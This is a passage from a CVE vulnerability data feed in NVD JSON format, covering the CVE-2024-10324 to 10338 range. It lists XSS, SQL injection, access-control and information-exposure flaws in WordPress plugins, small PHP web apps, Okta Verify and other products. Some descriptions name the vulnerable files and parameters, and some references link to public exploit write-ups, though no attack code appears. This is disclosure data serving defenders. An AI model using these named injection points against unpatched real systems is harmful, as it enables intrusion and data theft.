"https://wordpress.org/plugins/jetwidgets-for-elementor/#developers", "name" : "https://wordpress.org/plugins/jetwidgets-for-elementor/#developers", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3184475/", "name" : "https://plugins.trac.wordpress.org/changeset/3184475/", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The JetWidgets For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.0.18 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:crocoblock:jetwidgets_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.0.19", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-12T07:15Z", "lastModifiedDate" : "2025-02-05T17:18Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10324", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3220079/rometheme-for-elementor", "name" : "https://plugins.trac.wordpress.org/changeset/3220079/rometheme-for-elementor", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cd726b20-75c9-408e-86fc-061db591a9db?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cd726b20-75c9-408e-86fc-061db591a9db?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The RomethemeKit For Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.5.2 via the register_controls function in widgets/offcanvas-rometheme.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:rometheme:romethemekit_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.5.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2025-01-24T14:15Z", "lastModifiedDate" : "2025-02-04T19:41Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10325", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7773fd3a-2417-415e-97b0-735e99e62097?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7773fd3a-2417-415e-97b0-735e99e62097?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/header-footer-elementor/#developers", "name" : "https://wordpress.org/plugins/header-footer-elementor/#developers", "refsource" : "", "tags" : [ "Product", "Release Notes" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3182862/", "name" : "https://plugins.trac.wordpress.org/changeset/3182862/", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.6.45 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:brainstormforce:elementor_header_\\&_footer_builder:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.6.46", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-08T12:15Z", "lastModifiedDate" : "2024-11-13T20:01Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10326", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3220079/rometheme-for-elementor", "name" : "https://plugins.trac.wordpress.org/changeset/3220079/rometheme-for-elementor", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3231792/rometheme-for-elementor", "name" : "https://plugins.trac.wordpress.org/changeset/3231792/rometheme-for-elementor", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/230b3f2f-44cf-46eb-8e6a-3c52f2ea2fb9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/230b3f2f-44cf-46eb-8e6a-3c52f2ea2fb9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The RomethemeKit For Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_options and reset_widgets functions in all versions up to, and including, 1.5.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify plugin settings or reset plugin widgets to their default state (all enabled). NOTE: This vulnerability was partially fixed in version 1.5.3." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:rometheme:romethemekit_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.5.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2025-03-08T13:15Z", "lastModifiedDate" : "2025-03-12T16:24Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10327", "ASSIGNER" : "psirt@okta.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://help.okta.com/en-us/content/topics/releasenotes/okta-verify-release-notes.htm#panel2", "name" : "https://help.okta.com/en-us/content/topics/releasenotes/okta-verify-release-notes.htm#panel2", "refsource" : "", "tags" : [ ] }, { "url" : "https://trust.okta.com/security-advisories/okta-verify-for-ios-cve-2024-10327/", "name" : "https://trust.okta.com/security-advisories/okta-verify-for-ios-cve-2024-10327/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability in Okta Verify for iOS versions 9.25.1 (beta) and 9.27.0 (including beta) allows push notification responses through the iOS ContextExtension feature allowing the authentication to proceed regardless of the user’s selection. When a user long-presses the notification banner and selects an option, both options allow the authentication to succeed. \nThe ContextExtension feature is one of several push mechanisms available when using Okta Verify Push on iOS devices. The vulnerable flows include: \n* When a user is presented with a notification on a locked screen, the user presses on the notification directly and selects their reply without unlocking the device; \n* When a user is presented with a notification on the home screen and drags the notification down and selects their reply; \n* When an Apple Watch is used to reply directly to a notification. \n\n A pre-condition for this vulnerability is that the user must have enrolled in Okta Verify while the Okta customer was using Okta Classic. This applies irrespective of whether the organization has since upgraded to Okta Identity Engine." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-24T21:15Z", "lastModifiedDate" : "2024-10-25T12:56Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10329", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3af83ec2-9ebb-4cca-8523-8fe9b1517825?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3af83ec2-9ebb-4cca-8523-8fe9b1517825?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/ultimate-bootstrap-elements-for-elementor/trunk/inc/functions/core.php#L239", "name" : "https://plugins.trac.wordpress.org/browser/ultimate-bootstrap-elements-for-elementor/trunk/inc/functions/core.php#L239", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3176562/", "name" : "https://plugins.trac.wordpress.org/changeset/3176562/", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Ultimate Bootstrap Elements for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.6 via the 'ube_get_page_templates' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including the contents of templates that are private." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:g5plus:ultimate_bootstrap_elements_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.4.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-11-05T14:15Z", "lastModifiedDate" : "2024-11-08T15:59Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1033", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/nD654ot6zRQZ", "name" : "https://note.zhaoj.in/share/nD654ot6zRQZ", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.252308", "name" : "https://vuldb.com/?ctiid.252308", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252308", "name" : "https://vuldb.com/?id.252308", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://note.zhaoj.in/share/nD654ot6zRQZ", "name" : "https://note.zhaoj.in/share/nD654ot6zRQZ", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?id.252308", "name" : "https://vuldb.com/?id.252308", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252308", "name" : "https://vuldb.com/?ctiid.252308", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, has been found in openBI up to 1.0.8. Affected by this issue is the function agent of the file /application/index/controller/Datament.php. The manipulation of the argument api leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252308." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:openbi_project:openbi:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0.8", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-30T14:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10330", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-284" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/lunary-ai/lunary/commit/8ba1b8ba2c2c30b1cec30eb5777c1fda670cbbfc", "name" : "https://github.com/lunary-ai/lunary/commit/8ba1b8ba2c2c30b1cec30eb5777c1fda670cbbfc", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/598ecd65-1723-4fb7-a9aa-9c4f56a5a2aa", "name" : "https://huntr.com/bounties/598ecd65-1723-4fb7-a9aa-9c4f56a5a2aa", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In lunary-ai/lunary version 1.5.6, the `/v1/evaluators/` endpoint lacks proper access control, allowing any user associated with a project to fetch all evaluator data regardless of their role. This vulnerability permits low-privilege users to access potentially sensitive evaluation data." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:lunary:lunary:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.5.7", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-07-02T19:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10331", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://vuldb.com/?ctiid.281675", "name" : "VDB-281675 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281675", "name" : "VDB-281675 | PHPGurukul Vehicle Record System search-vehicle.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.427426", "name" : "Submit #427426 | PHPGurukul Vehicle Record System Project V1.0 SQL Injection", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in PHPGurukul Vehicle Record System 1.0. This issue affects some unknown processing of the file /admin/search-vehicle.php. The manipulation of the argument searchinputdata leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:vehicle_record_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-24T11:15Z", "lastModifiedDate" : "2024-11-01T12:41Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10332", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-xss-vulnerability-janto-impronta", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-xss-vulnerability-janto-impronta", "refsource" : "", "tags" : [ ] }, { "url" : "https://impronta.es/", "name" : "https://impronta.es/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A Cross-Site Scripting vulnerability has been found in Janto v4.3r11 from Impronta. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by sending the victim a malicious URL using the endpoint “/abonados/public/janto/main.php”." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-24T13:15Z", "lastModifiedDate" : "2024-10-25T12:56Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10334", "ASSIGNER" : "cybersecurity@ch.abb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-256" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://search.abb.com/library/Download.aspx?DocumentID=7PAA012159&LanguageCode=en&DocumentPartId=&Action=Launch", "name" : "https://search.abb.com/library/Download.aspx?DocumentID=7PAA012159&LanguageCode=en&DocumentPartId=&Action=Launch", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability exists in the VideONet product included in the listed System 800xA versions, where VideONet is used. \n\nAn attacker who successfully exploited the vulnerability could, in the worst case scenario, stop or manipulate the video feed.\nThis issue affects System 800xA: 5.1.X; System 800xA: 6.0.3.X; System 800xA: 6.1.1.X; System 800xA: 6.2.X." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-10T15:15Z", "lastModifiedDate" : "2025-02-10T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10335", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/tang-0717/VUL/blob/main/Garbage-Collection-Management-System-01.md", "name" : "https://github.com/tang-0717/VUL/blob/main/Garbage-Collection-Management-System-01.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281680", "name" : "VDB-281680 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281680", "name" : "VDB-281680 | SourceCodester Garbage Collection Management System login.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.427439", "name" : "Submit #427439 | SourceCodester Garbage Collection Management System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://www.sourcecodester.com/", "name" : "https://www.sourcecodester.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodester Garbage Collection Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter \"username\" to be affected. But it must be assumed that the parameter \"password\" is affected as well." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:sadat:garbage_collection_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-24T17:15Z", "lastModifiedDate" : "2024-10-28T15:58Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10336", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.281681", "name" : "VDB-281681 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281681", "name" : "VDB-281681 | SourceCodeHero Clothes Recommendation System Admin Login Page index.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.427442", "name" : "Submit #427442 | SourceCodeHero Clothes Recommendation System - Admin Login Page V1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodeHero Clothes Recommendation System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/index.php of the component Admin Login Page. The manipulation of the argument t1 leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:clothes_recommendation_system_project:clothes_recommendation_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-24T17:15Z", "lastModifiedDate" : "2024-10-28T16:01Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10337", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.281682", "name" : "VDB-281682 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.281682", "name" : "VDB-281682 | SourceCodeHero Clothes Recommendation System home.php sql injection", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?submit.427443", "name" : "Submit #427443 | SourceCodeHero Clothes Recommendation System - Add Item V1.0 SQL Injection", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in SourceCodeHero Clothes Recommendation System 1.0. Affected is an unknown function of the file /admin/home.php?con=add. The manipulation of the argument cat/subcat/ t1/t2/text leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:clothes_recommendation_system_project:clothes_recommendation_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-24T18:15Z", "lastModifiedDate" : "2024-10-30T14:02Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10338", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.281683", "name" : "VDB-281683 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.281683", "name" : "VDB-281683 | SourceCodeHero Clothes Recommendation System home.php sql injection", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?submit.427447", "name" : "Submit #427447 | SourceCodeHero Clothes Recommendation System - view parameter V1.0 SQL Injection", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in SourceCodeHero Clothes Recommendation System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/home.php. The manipulation of the argument view/view1 leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:clothes_recommendation_system_project:clothes_recommendation_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", 